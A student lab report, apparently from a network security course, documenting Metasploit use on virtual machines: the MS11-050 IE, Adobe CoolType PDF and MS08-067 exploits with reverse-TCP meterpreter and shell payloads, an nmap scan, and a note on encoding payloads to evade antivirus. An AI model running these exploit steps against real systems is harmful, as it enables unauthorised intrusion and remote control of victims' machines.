《网络攻防》实验五:MSF基础应用
IE浏览器渗透攻击——MS11050安全漏洞
实验准备
1.两台虚拟机,其中一台为kali,一台为Windows Xp Professional(两台虚拟机可以相互间ping通)。
2.亚军同学的指导书
实验步骤
1、在kali终端中开启msfconsole
。
2、输入命令use windows/browser/ms11_050_mshtml_cobjectelement
,进入该漏洞模块。
3、输入info查看信息:
4、设置对应的载荷set payload windows/meterpreter/reverse_tcp
;
一不小心输错指令,看来一边听歌一边输指令还是容易出错啊!
5、使用指show options
查看需要设置的相关信息:
6、使用指令set LHOST ‘kali Ip’
,set LPORT XXX
、set URIPATH XXX
设置地址,端口,统一资源标识符路径。
设置后,使用指令show options
查看
7、使用指令exploit
,以图可知,靶机需要访问的ip地址:http://192.168.88.147:8080/blog
8、在靶机IE上输入网址,并在靶机上查看信息。
如果你用的IE浏览器版本是1.7之前的,你会看到这样的结果
实验结果的最后是不会创建session 1,所以请用1.7以上版本的IE浏览器输入需要访问的ip地址。这样,你才能看到
kali中显示一个session 1已经创建
9、输入命令sessions -i 1,
开始连接
Adobe阅读器渗透攻击
实验准备
1.两台虚拟机,其中一台为kali,一台为Winattacker (两台虚拟机可以相互间ping通)。
2.亚军同学的指导书
实验步骤
1、在kali终端中开启msfconsole
。
2、输入命令use exploit/windows/fileformat/adobe_cooltype_sing
,进入该漏洞模块的使用。
3、使用命令set payload windows/meterpreter/reverse_tcp
设置攻击有效载荷。
4、输入命令show options
显示我们需要在攻击前需要设置的数据,如下图红框圈住的部分。
5、输入指令set FILENAME xxx.pdf
、 set LHOST "KALI Ip"
、set LPORT xxxx
生成你命名的pdf、设置地址、端口。
设置后,使用指令show options
查看
6、输入exploit
,生成pdf文件,并可以看到pdf所在文件夹,
将pdf复制到靶机里。再次之前,先安装一下增强工具吧
7、使用命令back
退出当前模块,并使用use exploit/multi/handler
新建一个监听模块。
8、使用set payload windws/meterpreter/reverse_tcp
建立一个反向连接。
9、使用命令exploit
开始攻击,在xp中打开pdf。这里pdf比较难打开,直接在kali中等结果就可以啦,如下图:
输入指令sysinfo
显示靶机相关信息
MS08_067漏洞渗透攻击实践
实验准备
1.两台虚拟机,其中一台为kali,一台为WinXPenSP3 (两台虚拟机可以相互间ping通)。
2.亚军同学的指导书
MS08_067远程漏洞攻击实践:Shell
1、在kali终端中开启msfconsole
。
2、输入命令search ms08_067
,会显示出找到的渗透模块,如下图所示:
3、输入命令use exploit/windows/smb/ms08_067_netapi
,进入该漏洞模块的使用。
4、输入命令show payload
会显示出有效的攻击载荷,如下图所示,我们找到一个shell_reverse_tcp。
5、命令show targets
会显示出可以被攻击的靶机的操作系统型号,如下图所示:
6、使用命令set payload generic/shell_reverse_tcp
设置攻击有效载荷。
7、输入命令show options
显示我们需要在攻击前需要设置的数据,如下图红框圈住的部分。
8、输入指令set LHOST "kali Ip"
、 set RHOST "Win xp Ip"
,设置后使用命令show options
再次查看payload状态。
9、输入命令exploit
开始攻击,如下图所示是正常攻击成功结果。
在kali上执行ipconfig/all
得到如下图所示:
在win xp上执行同样的命令,如下图所示:
MS08_067远程漏洞攻击实践:meterpreter
1、前面依然使用命令use exploit/windows/smb/ms08_067_netapi
,进入ms08_067漏洞模块。
2、设置payload:set payload windows/meterpreter/reverse_tcp
3、show options
,查看需要设置的ip地址,如下图所示,是已经设置好的
4、成功攻击结果:
5、执行ifconfig
,查看靶机地址:
在靶机上执行ifconfig
应用辅助模块
实验准备
1.两台虚拟机,其中一台为kali,一台为Win8 (虚拟机与主机可以相互间ping通)。
2.亚军同学的指导书
实验步骤
1、先手动创建一个msf所需的数据库,使用指令service postgresql start
、msfdb start
2、开启msf,使用指令msfconsole
3、开启nmap扫描,可以看见开启的端口号,以及目标机的操作系统
用自己的话解释什么是exploit,payload,encode.
exploit
,Metaploit目录中所有可用的漏洞利用代码。
payload
,Metaploit目录中攻击载荷,是系统被攻陷后执行的操作。通常攻击载荷附加于漏洞攻击模块之上,随漏洞攻击一起分发。
encode
,对后门程序进行编码处理,使其免杀。
实验总结与体会
首先,我要坦白,因为本次四个实验我完全按着科技负责人张亚军的实验博客照本宣科,没有创新。我也曾不愿活在张亚军同学的“影子”下,一个叫羞耻心的小人在我心里疯狂呐喊着“我想当勇士!我要利用一个和别人都不一样漏洞做实验!”于是我百度到一个 叫Ms07-029
远程溢出漏洞,根据相关资料,我明白了在exploit之前,我需要下一个叫dns.exe的小工具。不得不说,现在在网上下载这些小工具,真的是大浪淘沙,看到各种绿色无毒,快速下载的幌子,我头都大了。生怕下载工具后,在桌面右下角弹出美女照片,我从来没有这么抗拒美女照片过。好吧,工夫不负有心人
喏,就是它了。首先要打开它,我在Kali里打开它,提示我无法打开二进制文件,于是我决定在主机WIN下打开,在我输入./dns.exe
指令后,终端提醒我.不是内部指令,后来我百度了才知道,在WIN终端下打开文件的命令是staet,好怕娄老师跳出来打我呀。好吧,在我输入指令start dns.exe
后,有个转瞬即逝的窗口,纳尼?这就没了,这和我看得实验指导书不一样啊,按理说剧本应该是这样
然而现实给我一个下勾拳
在寻求班级大触高其的帮助后依然无果后,一阵疲惫感不由自主地泛上心头,原来勇士不是那么好做的。心里的大坝最终还是决堤了,飞流直下,小人儿失落地站在瀑布底,沉默地淋着。至此,我知道我的雄心壮志不过三分钟热度,狼狈不堪地收拾散落一地的道具,删除dns.exe,关掉网上的指导书,结束闹剧。